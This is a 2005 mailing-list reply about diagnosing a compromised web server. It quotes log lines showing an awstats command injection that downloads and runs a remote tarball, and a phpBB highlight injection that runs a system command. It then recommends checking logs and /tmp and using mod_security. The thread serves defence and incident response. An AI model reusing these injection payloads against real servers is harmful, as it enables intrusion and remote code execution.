On Sun, Jul 24, 2005 at 01:19:25PM +0200, Christoph Haas wrote: > Since the process runs as "www-data" some kiddy has abused a web service > on your server to download and run an external software. Look for > suspicious log lines of your web server.
Yes .. > Examples of hacks on our servers: > > 82.55.78.243 - - [26/Feb/2005:20:04:59 +0100] "GET > /cgi-bin/awstats.pl?configdir=%20%7c%20cd%20%2ftmp%3bwget%20www.geocities.com%2fmadahack%2fa.tgz%3b%20tar%20zxf%20a.tgz%3b%20rm%20-f%20a.tgz%3b%20.%2fa%20%7c%20 > HTTP/1.1" 200 422 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT > 5.1; SV1; FunWebProducts)" > 211-255-23-42.rev.krline.net - - [04/Dec/2004:17:43:06 +0100] "GET > /phpbb/viewto > pic.php?t=27&highlight=%2527%252esystem(chr(108)%252echr(115)%252echr(32)%252ech > r(45)%252echr(108)%252echr(97)%252echr(32)%252echr(47)%252echr(118)%252echr(97)% > 252echr(114)%252echr(47)%252echr(119)%252echr(119)%252echr(119))%252e%2527 > HTTP/ > 1.0" 200 28732 "-" "PHP/4.3.4" > > It should be rather easy finding signs of weird accesses like %20 or > chr(). Also look for weird signs in /tmp. Both of these attacks could be prevented by the use of mod_security, which I'd recommend you look into using in the future if you have potentially untrusted scripts running. Steve -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
